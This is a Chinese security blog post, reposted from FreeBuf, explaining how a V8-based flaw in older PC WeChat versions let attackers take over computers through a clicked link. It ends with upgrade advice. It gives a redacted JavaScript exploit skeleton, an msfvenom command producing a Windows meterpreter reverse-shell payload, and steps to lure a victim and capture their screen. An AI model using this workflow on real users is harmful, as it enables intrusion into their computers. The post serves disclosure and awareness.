电脑被黑客控制的表现

Hello！大家好！欢迎来到网络安全情报局，一起跟随网络安全特工走进危机四伏的网络世界。当然大家也可以关注我的公众号：网络安全情报局，更多的网络安全资讯、海量干货以及一些 实用工具等你来解锁！

近期，我们的网络安全特工发现微信存在高危漏洞！只要点击链接，你的电脑就可能被黑客完全控制！下面网络安全情报局为大家揭秘黑客是如何操作的。

注：以下仅供分享，其它违法行为均与作者无关

1、漏洞利用的html，通过html调用JavaScript

2、wa.js 这里就不展示恶意部分了

ENABLE_LOG = true;

IN_WORKER = true;

var shellcode = [ ]

·

·

·

try{

print("start running");

trigger();

}catch(e){

print(e);

}

3、使用Kali自带的msfvenom生成反弹木马，并将生成十六进制添加到上面代码的shellcode中

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.65 lport=9999 -f csharp

4、再使用metersploit监听端口，设置本地ip和本地监听端口

5、再使用python开发web服务器

6、将恶意链接发送到微信，并用微信点击打开

7、此时受害者就已经中招了，可以使用screenshot命令获取受害者PC当前画面的截图，可以想做什么就做什么了

看到这里，是不是觉得太恐怖了！

别担心，网络安全特工提醒您：赶紧PC端微信快升级到最新版本！！！

根据腾讯安全中心的公告，这是因为chrome浏览器使用的V8引擎存在安全问题导致的。该漏洞仅影响windows版本的PC版微信，且只影响3.2.1.141以下版本。

原作者：WeyCiu丶

转载自：https://www.freebuf.com/vuls/270497.html